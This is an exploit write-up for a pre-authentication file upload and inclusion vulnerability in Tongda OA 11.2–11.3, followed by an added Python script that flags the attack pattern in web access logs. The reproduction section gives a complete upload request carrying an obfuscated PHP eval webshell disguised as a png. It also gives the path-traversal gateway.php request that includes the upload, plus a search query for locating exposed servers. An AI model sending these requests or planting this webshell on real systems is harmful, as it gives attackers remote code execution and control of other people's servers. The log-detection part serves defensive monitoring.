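Tongda OA ispirit pre-authentication file inclusion vulnerability
1. Vulnerability overview
Tongda OA is a collaborative office automation system developed in-house by Beijing Tongda Xinke Technology Co., Ltd. (北京通达信科科技有限公司). It covers workflow approval, administrative office work, daily affairs, statistical data analysis, instant messaging, mobile office and more. The ispirit/im/upload.php file allows arbitrary file upload with authentication bypassed, and the uploaded file can then be included through /ispirit/interface/gateway.php, which gives control of the server (getshell).
2. Affected versions
- Tongda OA V11.2 to Tongda OA 11.3
3. Asset mapping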
- hunter
app.name="通达 OA"
- Fingerprint
4. Reproduction
Upload the file
POST /ispirit/im/upload.php HTTP/1.1
Host: {hostname}
Content-Length: 639
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="png"
Content-Type: image/jpeg
<?php class GB7W5S8T { public function __construct($H7U41){ @eval("/*Zc98EhVx4t*/".$H7U41."/*Zc98EhVx4t*/"); }}new GB7W5S8T($_REQUEST['x']);?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
Include the uploaded file through the file inclusion to get a shell
/ispirit/interface/gateway.php?json={"url":"/general/../../attach/im/2307/1775389563.png"}
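For defenders, the two requests above leave a recognizable pair in web access logs: a POST to /ispirit/im/upload.php, then a gateway.php request whose json parameter carries a url with path traversal into the attach directory. The following is an added detection example, not part of the original write-up or of Tongda's code; it assumes combined-format access logs, and the log lines, IP addresses and function names are constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
UPLOAD_PATH = "/ispirit/im/upload.php"
GATEWAY_PATH = "/ispirit/interface/gateway.php"
# Constructed sample lines (documentation IPs); not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2023:10:00:01 +0800] "POST /ispirit/im/upload.php HTTP/1.1" 200 52',
    '198.51.100.4 - - [01/Jul/2023:10:00:03 +0800] "GET /general/index.php HTTP/1.1" 200 4312',
    '203.0.113.7 - - [01/Jul/2023:10:00:05 +0800] "GET /ispirit/interface/gateway.php?json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2307%2F1775389563.png%22%7D HTTP/1.1" 200 0',
]

def gateway_include_target(target):
    """Return the json "url" value if it uses traversal or points at /attach/."""
    parts = urlsplit(target)
    if parts.path.lower() != GATEWAY_PATH:
        return None
    for raw in parse_qs(parts.query).get("json", []):
        try:
            url = json.loads(raw).get("url", "")
        except (ValueError, AttributeError):
            continue  # not JSON, or JSON that is not an object
        if isinstance(url, str) and (".." in url or "/attach/" in url.lower()):
            return url
    return None

def find_upload_then_include(lines):
    """Report suspicious gateway.php includes and whether the same client uploaded first."""
    uploaders, findings = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, _status = m.groups()
        if method == "POST" and urlsplit(target).path.lower() == UPLOAD_PATH:
            uploaders.add(ip)
            continue
        included = gateway_include_target(target)
        if included is not None:
            findings.append({"ip": ip, "time": ts, "include": included,
                             "preceded_by_upload": ip in uploaders})
    return findings

if __name__ == "__main__":
    for hit in find_upload_then_include(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so this covers the GET form shown above; parameters sent in a request body need WAF or application-level logging to be seen.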